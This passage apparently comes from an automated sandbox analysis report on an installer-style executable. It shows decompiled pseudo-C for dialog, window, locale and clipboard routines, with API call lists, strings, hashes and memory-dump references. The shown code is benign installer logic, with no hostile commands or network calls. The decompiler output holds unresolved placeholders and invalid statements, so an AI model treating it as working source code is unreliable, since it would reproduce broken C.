				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405362
0x0040536a
0x0040536d
0x00405375
0x00405378
0x00405507
0x0040550d
0x0040552a
0x00405531
0x00405531
0x0040553d
0x00405543
0x00405565
0x00405565
0x0040556b
0x004055c0
0x004055c0
0x004055c3
0x00000000
0x00000000
0x004055c5
0x004055c8
0x004055cb
0x00000000
0x00000000
0x004055d5
0x004055db
0x004055dd
0x004055e0
0x004056dd
0x00000000
0x004056dd
0x004055ef
0x004055fb
0x00405604
0x0040560b
0x0040560f
0x00405612
0x0040561b
0x00405621
0x00405624
0x00405624
0x00405634
0x0040563a
0x0040563d
0x00405648
0x00405648
0x00405649
0x0040564c
0x00405653
0x0040565a
0x00405662
0x00405662
0x00405670
0x00405676
0x00405679
0x00405679
0x00405680
0x00405686
0x0040568f
0x00405696
0x0040569f
0x004056a1
0x004056a4
0x004056b3
0x004056b5
0x004056b8
0x004056b9
0x004056bc
0x004056bd
0x004056be
0x004056be
0x004056c6
0x004056d1
0x004056d7
0x004056d7
0x00000000
0x0040563d
0x0040556d
0x00405573
0x004055a1
0x004055a3
0x004055a9
0x004055ab
0x004055b4
0x004055b4
0x004055bb
0x00000000
0x004055bb
0x00405577
0x00405581
0x00000000
0x00405545
0x00405545
0x0040554b
0x00405586
0x00000000
0x0040558d
0x00405554
0x0040555b
0x00405560
0x00000000
0x00405560
0x00405543
0x0040537e
0x00405382
0x0040538a
0x0040538e
0x00405391
0x00405394
0x00405397
0x0040539a
0x0040539b
0x0040539c
0x004053b5
0x004053b8
0x004053c2
0x004053d1
0x004053d9
0x004053e1
0x004053e6
0x004053e9
0x004053f5
0x004053fe
0x00405407
0x00405429
0x0040542f
0x00405440
0x00405445
0x00405453
0x00405461
0x00405461
0x00405466
0x00405474
0x00405474
0x00405479
0x0040547c
0x00405481
0x0040548d
0x00405496
0x004054a3
0x004054b2
0x004054a5
0x004054aa
0x004054aa
0x004054be
0x004054be
0x004054d2
0x004054db
0x004054e4
0x004054f4
0x00405500
0x00405500
0x00000000

APIs

GetDlgItem.USER32 ref: 004053BB
GetDlgItem.USER32 ref: 004053CA
GetClientRect.USER32 ref: 00405407
GetSystemMetrics.USER32 ref: 0040540E
SendMessageA.USER32 ref: 0040542F
SendMessageA.USER32 ref: 00405440
SendMessageA.USER32 ref: 00405453
SendMessageA.USER32 ref: 00405461
SendMessageA.USER32 ref: 00405474
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
ShowWindow.USER32(?,00000008), ref: 004054AA
GetDlgItem.USER32 ref: 004054CB
SendMessageA.USER32 ref: 004054DB
SendMessageA.USER32 ref: 004054F4
SendMessageA.USER32 ref: 00405500
GetDlgItem.USER32 ref: 004053D9

Part of subcall function 004041B0: SendMessageA.USER32 ref: 004041BE

GetDlgItem.USER32 ref: 0040551C
CreateThread.KERNELBASE ref: 0040552A
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405531
ShowWindow.USER32(00000000), ref: 00405554
ShowWindow.USER32(?,00000008), ref: 0040555B
ShowWindow.USER32(00000008), ref: 004055A1
SendMessageA.USER32 ref: 004055D5
CreatePopupMenu.USER32 ref: 004055E6
AppendMenuA.USER32 ref: 004055FB
GetWindowRect.USER32 ref: 0040561B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
SendMessageA.USER32 ref: 00405670
OpenClipboard.USER32(00000000), ref: 00405680
EmptyClipboard.USER32 ref: 00405686
GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
GlobalLock.KERNEL32 ref: 00405699
SendMessageA.USER32 ref: 004056AD
GlobalUnlock.KERNEL32(00000000), ref: 004056C6
SetClipboardData.USER32 ref: 004056D1
CloseClipboard.USER32 ref: 004056D7

Strings

Name Setup: Completed, xrefs: 0040564C

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: Name Setup: Completed
API String ID: 4154960007-1721692471
Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 00403CA7, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0x2
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878; // 0x1
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0x2
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0x2
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890); // executed
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8); // executed
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8); // executed
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8); // executed
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60); // executed
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0x2
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x303a4
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa); // executed
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403cb0
0x00403cb9
0x00403dfa
0x00403dfe
0x00403e02
0x00403e04
0x00403e09
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e28
0x00403e2b
0x00403e30
0x00403e3e
0x00403e4b
0x00403e52
0x00403e52
0x00403e53
0x00403e53
0x00403e58
0x00403e5e
0x00403e65
0x00403e6b
0x00403e6d
0x00403ead
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00403ec5
0x00403ec7
0x00403ecc
0x00403ed2
0x00403ed6
0x00403ed6
0x00403edb
0x00403ee1
0x00000000
0x00000000
0x00403eec
0x00403ef2
0x00000000
0x00000000
0x00403efb
0x00403f03
0x00403f08
0x00403f0b
0x00403f11
0x00403f16
0x00403f19
0x00403f1f
0x00403f24
0x00403f27
0x00403f2d
0x00403f35
0x00403f3b
0x00403f41
0x00403f45
0x00403f4c
0x00403f4c
0x00403f4c
0x00403f56
0x00403f68
0x00403f74
0x00403f79
0x00403f83
0x00403f89
0x00403f8b
0x00403f90
0x00403f8d
0x00403f8d
0x00403f8d
0x00403fa0
0x00403fb8
0x00403fba
0x00403fc0
0x00403fd5
0x00403fc2
0x00403fcb
0x00403fcd
0x00403fcd
0x00403fdb
0x00403fec
0x00403ffd
0x00404004
0x0040400a
0x0040400e
0x00404013
0x00404015
0x00000000
0x0040401b
0x0040401b
0x0040401d
0x00000000
0x00000000
0x00404023
0x00404027
0x0040404c
0x00404052
0x00404058
0x0040405a
0x00000000
0x00000000
0x00404080
0x00404086
0x00404088
0x0040408d
0x00000000
0x00000000
0x00404093
0x00404096
0x00404099
0x004040b0
0x004040bc
0x004040d5
0x004040db
0x004040df
0x004040e4
0x004040ea
0x00000000
0x00000000
0x004040f4
0x004040ff
0x00000000
0x004040ff
0x00404029
0x0040402f
0x00000000
0x00000000
0x00404035
0x0040403b
0x00000000
0x00000000
0x00000000
0x00404041
0x00404015
0x0040410c
0x00404118
0x0040411f
0x00000000
0x00403e6f
0x00403e6f
0x00403e72
0x00403ea5
0x00403ea5
0x00403ea7
0x00000000
0x00000000
0x00000000
0x00403ea7
0x00403e74
0x00403e78
0x00403e7d
0x00403e7f
0x00000000
0x00000000
0x00403e8f
0x00403e97
0x00000000
0x00403e9d
0x00403ccb
0x00403ccb
0x00403ccf
0x00403cd4
0x00403ce3
0x00403ce3
0x00403cec
0x00403cf5
0x00403d00
0x00403d00
0x00403d0c
0x00403d28
0x00403d2b
0x00403d3e
0x00403d44
0x00403de7
0x00000000
0x00403df0
0x00403d4a
0x00403d57
0x00403d59
0x00403d5b
0x00403d7a
0x00403d7a
0x00403d7d
0x00403d82
0x00403d85
0x00403d95
0x00403d96
0x00403d98
0x00403dce
0x00403de1
0x00000000
0x00403de1
0x00403d9a
0x00403da0
0x00403db9
0x00403dbe
0x00403dc0
0x00000000
0x00000000
0x00403dc2
0x00403dae
0x00403dae
0x00403db0
0x00403db0
0x00000000
0x00403db0
0x00403da3
0x00403da8
0x00000000
0x00403da8
0x00403d87
0x00403d8d
0x00000000
0x00000000
0x00403d8f
0x00000000
0x00403d8f
0x00403d7f
0x00000000
0x00403d7f
0x00403d65
0x00403d6c
0x00403d72
0x00403d74
0x00000000
0x00000000
0x00000000
0x00403d74
0x00403d30
0x00000000
0x00403d0e
0x00403d14
0x00403d1e
0x00404125
0x0040412b
0x0040412d
0x00404133
0x00404138
0x0040413e
0x0040413e
0x00404133
0x00404148
0x00000000
0x00404148
0x00403d0c

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
ShowWindow.USER32(?), ref: 00403D00
DestroyWindow.USER32 ref: 00403D14
SetWindowLongA.USER32 ref: 00403D30
GetDlgItem.USER32 ref: 00403D51
SendMessageA.USER32 ref: 00403D65
IsWindowEnabled.USER32(00000000), ref: 00403D6C
GetDlgItem.USER32 ref: 00403E1A
GetDlgItem.USER32 ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
SendMessageA.USER32 ref: 00403E8F
GetDlgItem.USER32 ref: 00403F35
ShowWindow.USER32(00000000,?), ref: 00403F56
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F68
EnableWindow.USER32(?,?), ref: 00403F83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
EnableMenuItem.USER32 ref: 00403FA0
SendMessageA.USER32 ref: 00403FB8
SendMessageA.USER32 ref: 00403FCB
lstrlenA.KERNEL32(Name Setup: Completed,?,Name Setup: Completed,00000000), ref: 00403FF5
SetWindowTextA.USER32(?,Name Setup: Completed), ref: 00404004
ShowWindow.USER32(?,0000000A), ref: 00404138

Strings

Name Setup: Completed, xrefs: 00403FE5, 00403FEB, 00403FF4, 00404002

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID: Name Setup: Completed
API String ID: 3906175533-1721692471
Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040390A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890; // 0x4e
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00406055("1033",  *_t17() & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5); // executed
							_t34 = E00406492("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x3a
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403910
0x00403919
0x00403920
0x00403922
0x00403936
0x00403948
0x0040394f
0x00403956
0x0040395c
0x00403961
0x00403967
0x0040397a
0x0040397a
0x00403985
0x00403924
0x0040392f
0x0040392f
0x0040398a
0x00403994
0x0040399d
0x004039a2
0x004039b3
0x00403a3a
0x00403a42
0x00403a4b
0x00403a4b
0x00403a61
0x00403a67
0x00403a75
0x00403af6
0x00403afe
0x00403b08
0x00403b0d
0x00403b13
0x00403b9d
0x00403ba2
0x00403ba4
0x00403bc0
0x00000000
0x00403bc0
0x00403ba6
0x00403bac
0x00403bb4
0x00403bb4
0x00000000
0x00403bac
0x00403b21
0x00403b2c
0x00403b31
0x00403b33
0x00403b3a
0x00403b3a
0x00403b45
0x00403b4d
0x00403b4f
0x00403b51
0x00403b5a
0x00403b5d
0x00403b63
0x00403b63
0x00403b69
0x00403b82
0x00403b93
0x00000000
0x00403b98
0x00403b00
0x00403b02
0x00000000
0x00403a77
0x00403a77
0x00403a83
0x00403a8d
0x00403a93
0x00403a98
0x00403aa7
0x00403bc5
0x00403bc5
0x00000000
0x00403bc5
0x00403ab6
0x00403af1
0x00000000
0x00403af1
0x004039b9
0x004039b9
0x004039bc
0x004039be
0x00000000
0x00000000
0x004039c8
0x004039d8
0x004039dd
0x004039e4
0x00000000
0x00000000
0x004039e8
0x004039ea
0x004039f7
0x004039f7
0x004039ff
0x00403a05
0x00403a2d
0x00403a35
0x00000000
0x00403a17
0x00403a18
0x00403a21
0x00403a27
0x00403a28
0x00000000
0x00403a28
0x00403a23
0x00403a25
0x00000000
0x00000000
0x00000000
0x00403a25
0x00403a05

APIs

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

lstrcatA.KERNEL32(1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,00000000), ref: 00403985
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,7519FA90), ref: 004039FA
lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000), ref: 00403A0D
GetFileAttributesA.KERNEL32(: Completed), ref: 00403A18
LoadImageA.USER32 ref: 00403A61

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

RegisterClassA.USER32 ref: 00403A9E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
CreateWindowExA.USER32 ref: 00403AEB
ShowWindow.USER32(00000005,00000000), ref: 00403B21
GetClassInfoA.USER32 ref: 00403B4D
GetClassInfoA.USER32 ref: 00403B5A
RegisterClassA.USER32 ref: 00403B63
DialogBoxParamA.USER32 ref: 00403B82

Strings

"C:\Users\user\Desktop\yRqHWQ91dT.exe" , xrefs: 0040390E
_Nb, xrefs: 00403A7D, 00403AE5
.exe, xrefs: 00403A07
RichEdit, xrefs: 00403B54
Name Setup: Completed, xrefs: 00403936, 0040393C, 00403961, 0040396A, 0040397F
.DEFAULT\Control Panel\International, xrefs: 00403970
RichEd32, xrefs: 00403B35
1033, xrefs: 0040392A, 00403980
C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00403994, 0040399C, 00403A34, 00403A3A, 00403A4A
: Completed, xrefs: 004039C8, 004039D0, 004039DD, 00403A27, 00403A2D
RichEdit20A, xrefs: 00403B45, 00403B4B
RichEd20, xrefs: 00403B27
C:\Users\user\AppData\Local\Temp\, xrefs: 0040390F
Control Panel\Desktop\ResourceLocale, xrefs: 0040393E

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
